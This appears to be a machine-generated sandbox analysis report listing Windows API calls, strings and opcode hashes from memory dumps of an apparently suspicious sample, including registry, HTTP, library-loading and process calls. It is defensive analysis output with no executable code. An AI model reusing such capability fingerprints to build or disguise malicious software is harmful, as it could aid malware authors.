                                                              • Opcode ID: e6a22f1ecf95ab2c3af49eac6ea5ad207e1d4b1e0159df2dd19ce09ed2e7ea6f
                                                              • Instruction ID: 3f21fadb4d6bab98d0bbb544075a6f8689d68688cd7b218b082f2d80eff7d8ec
                                                              • Opcode Fuzzy Hash: e6a22f1ecf95ab2c3af49eac6ea5ad207e1d4b1e0159df2dd19ce09ed2e7ea6f
                                                              • Instruction Fuzzy Hash: DF51D271A083019AD7969F28D845A6F77E8EFA5330F04892FF898D2291DB74CD44B753
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F6D5D4
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F6D60A
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F6D61B
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F6D69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: e70f81518319d9dfc728d76a769562194eb3347935625fe23c3818b5d225fe1a
                                                              • Instruction ID: 55e8f7e6fc4f7576b1099a6efa23b2f42ce8ef586c28a156e09b41efd8d1a94e
                                                              • Opcode Fuzzy Hash: e70f81518319d9dfc728d76a769562194eb3347935625fe23c3818b5d225fe1a
                                                              • Instruction Fuzzy Hash: E6417EB1B00205EFDB05DF64C884B9A7BA9EF44314F1581AAED09DF246D7B2DD44EBA0
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F727C0
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F727DC
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00F72822
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FD5890,00000000), ref: 00F7286B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: d2a64d88a6a8fc1f5ee36f952168cfd64a92109dc743956db45dce19b5d015c3
                                                              • Instruction ID: 2540e72647cc11448a52c1ebe5c6c418efe601c90b63eb65876bb9635ce7ab5a
                                                              • Opcode Fuzzy Hash: d2a64d88a6a8fc1f5ee36f952168cfd64a92109dc743956db45dce19b5d015c3
                                                              • Instruction Fuzzy Hash: DB41CE716043419FD760DF24CC44B1ABBE9EF85320F04892FF8A997292D735A805DB53
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F8D7C5
                                                                • Part of subcall function 00F1784B: _memmove.LIBCMT ref: 00F17899
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower_memmove
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 3425801089-567219261
                                                              • Opcode ID: b90ef98a0afb661ab25c51a776c69e2f14bf8032ba5bffdf132cf1d6fce20238
                                                              • Instruction ID: 4fd0f4f6a5d5472b763f5cc1d815cc3e0a0697b4994c92f9c8daf8eb87891ecb
                                                              • Opcode Fuzzy Hash: b90ef98a0afb661ab25c51a776c69e2f14bf8032ba5bffdf132cf1d6fce20238
                                                              • Instruction Fuzzy Hash: 8731B07190461AABCF00FF54CC559EEB3B8FF04320F10862AE825977D1DB75A905EB80
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F6AABC
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F68F14
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F68F27
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00F68F57
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_memmove$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 365058703-1403004172
                                                              • Opcode ID: bf7f3a25bc7389db9076a4cf7d0843645d077a8213deffc2eb2a3726bab47732
                                                              • Instruction ID: 5f0a644499de5387cd4be7c5be300d2d814bd607fa8806a7a0c9e7aaae8577d0
                                                              • Opcode Fuzzy Hash: bf7f3a25bc7389db9076a4cf7d0843645d077a8213deffc2eb2a3726bab47732
                                                              • Instruction Fuzzy Hash: 5921D075A04208BEDB14ABB09C86DFEB779DF45360F14462EF825A71E1DF39484ABA10
                                                              APIs
                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8184C
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F81872
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F818A2
                                                              • InternetCloseHandle.WININET(00000000), ref: 00F818E9
                                                                • Part of subcall function 00F82483: GetLastError.KERNEL32(?,?,00F81817,00000000,00000000,00000001), ref: 00F82498
                                                                • Part of subcall function 00F82483: SetEvent.KERNEL32(?,?,00F81817,00000000,00000000,00000001), ref: 00F824AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                              • String ID:
                                                              • API String ID: 3113390036-3916222277
                                                              • Opcode ID: b0ca8484f54fdd0d73d9845253ce7c96ba29393a9c12bd2edcdabc00b7e4d55e
                                                              • Instruction ID: f0be3363bcab4374a24cd1a7c8c1d9f4dea78afd1bacd7daf2ae5a911d35902e
                                                              • Opcode Fuzzy Hash: b0ca8484f54fdd0d73d9845253ce7c96ba29393a9c12bd2edcdabc00b7e4d55e
                                                              • Instruction Fuzzy Hash: 8E217FB150020CBFEB11AB649C86EFB76ADFB48754F10422AF505D7140DB649D0A67A1
                                                              APIs
                                                                • Part of subcall function 00F11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F11D73
                                                                • Part of subcall function 00F11D35: GetStockObject.GDI32(00000011), ref: 00F11D87
                                                                • Part of subcall function 00F11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F11D91
                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F96461
                                                              • LoadLibraryW.KERNEL32(?), ref: 00F96468
                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F9647D
                                                              • DestroyWindow.USER32(?), ref: 00F96485
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                              • String ID: SysAnimate32
                                                              • API String ID: 4146253029-1011021900
                                                              • Opcode ID: d6da17c3ef72fbfd06368f6bf809c8a20f3fb13bc46caacb069fdd087f9d7012
                                                              • Instruction ID: e8792a6ab792204e20ee4570b0311b145181163a26ba3f969c7bfcaa0018204a
                                                              • Opcode Fuzzy Hash: d6da17c3ef72fbfd06368f6bf809c8a20f3fb13bc46caacb069fdd087f9d7012
                                                              • Instruction Fuzzy Hash: 56215871610209BBFF108FA8DC84EBA77A9EB59778F204629FA10D2190D775DC91B760
                                                              APIs
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00F76DBC
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F76DEF
                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00F76E01
                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F76E3B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: a46dd5c4873e70b862957d40b6128510fdfea416b8e84370b9bf2bd0f584cd76
                                                              • Instruction ID: b761961f0200798500c430268e0f32b6a0a58a3f6ebdd475e31c749dfb26601d
                                                              • Opcode Fuzzy Hash: a46dd5c4873e70b862957d40b6128510fdfea416b8e84370b9bf2bd0f584cd76
                                                              • Instruction Fuzzy Hash: C421A175A00609AFDB309F29DC04B9A7BB4EF44720F20862BFCA4D72D0D7709855AB66
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00F76E89
                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F76EBB
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00F76ECC
                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F76F06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$FilePipe
                                                              • String ID: nul
                                                              • API String ID: 4209266947-2873401336
                                                              • Opcode ID: eddf99fe64cdbb07a6e1ff2e81fa151cb5a2c5418802979112ed04c00b950fe1
                                                              • Instruction ID: 45d1460824ef249d41e32858aa8954ebc4fea2f48c56136e2211080e2084bd68
                                                              • Opcode Fuzzy Hash: eddf99fe64cdbb07a6e1ff2e81fa151cb5a2c5418802979112ed04c00b950fe1
                                                              • Instruction Fuzzy Hash: D621C4759007059BDB209F69DC04B9A77A8EF45730F208A1BFCA4D32D0D770A840E766
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00F7AC54
                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F7ACA8
                                                              • __swprintf.LIBCMT ref: 00F7ACC1
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F9F910), ref: 00F7ACFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                              • String ID: %lu
                                                              • API String ID: 3164766367-685833217
                                                              • Opcode ID: 9d114441944566208f4e9be37240a43ed4d1b670a42b7cc8ff4e453d6ac05e4f
                                                              • Instruction ID: c50a3800e4e8d1077c1d669acf4ac4d72f41a7811f9b4f9be2f7749515ccb90f
                                                              • Opcode Fuzzy Hash: 9d114441944566208f4e9be37240a43ed4d1b670a42b7cc8ff4e453d6ac05e4f
                                                              • Instruction Fuzzy Hash: 81217131A00109EFCB10DF64CD45EEE7BB8EF89714B10406AF909DB251DA75EA45EB62
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00F71B19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              • Opcode ID: 6265307b5458e6c1230138eb28847a355c829c1d8d186fd9f535fa50de67daca
                                                              • Instruction ID: 01ab86a9997bd33777d3a01f3a5219113ed648987d237e0b4d0221dc61327c88
                                                              • Opcode Fuzzy Hash: 6265307b5458e6c1230138eb28847a355c829c1d8d186fd9f535fa50de67daca
                                                              • Instruction Fuzzy Hash: 641182319002098FCF00EF58DC629EEB3B5FF65314F14846AD81497252EB365D0AEB40
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F8EC07
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F8EC37
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F8ED6A
                                                              • CloseHandle.KERNEL32(?), ref: 00F8EDEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: 3fa392309cebff0f11fb46b5af4a13dcdd917f4ce5e6ecf3aa8723f5cedbaf1a
                                                              • Instruction ID: e67d43ad730ff37e4ac6cc990e4da532df669473aa3f6de304b07d3c24d68a7e
                                                              • Opcode Fuzzy Hash: 3fa392309cebff0f11fb46b5af4a13dcdd917f4ce5e6ecf3aa8723f5cedbaf1a
                                                              • Instruction Fuzzy Hash: CB8191716043009FD720EF28CC96FAAB7E5AF84720F14881DF999DB292D7B4AC45DB81
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1559183368-0
                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction ID: 4ac19bb4e8cf0d4bcdf2f0053e84e067d25018333c3b65d7e73827c83b65b418
                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction Fuzzy Hash: E751B671E00B05DBDB28CFA9DC5066E77B6AF80B35F288729F825962D0D774ED50AB40
                                                              APIs
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                                • Part of subcall function 00F90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8FDAD,?,?), ref: 00F90E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F900FD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9013C
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F90183
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00F901AF
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F901BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                              • String ID:
                                                              • API String ID: 3440857362-0
                                                              • Opcode ID: 2ff6fe16e641ed311129840ad7ed3f5f754a601d3b72f36e0d579acf4c9291de
                                                              • Instruction ID: 6c5187cbb4c6529d0314cf32dfb87a895ce16296becff86e021cc6ca253aefc6
                                                              • Opcode Fuzzy Hash: 2ff6fe16e641ed311129840ad7ed3f5f754a601d3b72f36e0d579acf4c9291de
                                                              • Instruction Fuzzy Hash: F2516E31608204AFDB14EF58CC81FAAB7E9FF84314F44492DF555872A1DB35E948EB52
                                                              APIs
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F8D927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00F8D9AA
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F8D9C6
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00F8DA07
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F8DA21
                                                                • Part of subcall function 00F15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F77896,?,?,00000000), ref: 00F15A2C
                                                                • Part of subcall function 00F15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F77896,?,?,00000000,?,?), ref: 00F15A50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: 3ffb455c3c37b0d39de2d0b1339e609ed68cadd3f4e83c8feeedb760f218af10
                                                              • Instruction ID: d437f88881a6bf7ed1c4d411ea591271400066d1a41f89d1edc09e46da03434e
                                                              • Opcode Fuzzy Hash: 3ffb455c3c37b0d39de2d0b1339e609ed68cadd3f4e83c8feeedb760f218af10
                                                              • Instruction Fuzzy Hash: C3513935A04209DFCB04EFA8C8849EDB7B4FF48320B148069E859AB352D735EE85DF91
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F7E61F
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00F7E648
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F7E687
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F7E6AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F7E6B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
